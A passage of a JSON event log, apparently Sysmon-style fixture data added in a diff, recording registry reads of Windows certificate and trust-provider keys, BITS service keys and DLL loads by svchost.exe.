"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878710000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": 
"BITS", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FlightSettings.dll", + "image_path": "C:\\Windows\\System32\\FlightSettings.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcd.dll", + "image_path": "C:\\Windows\\System32\\bcd.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 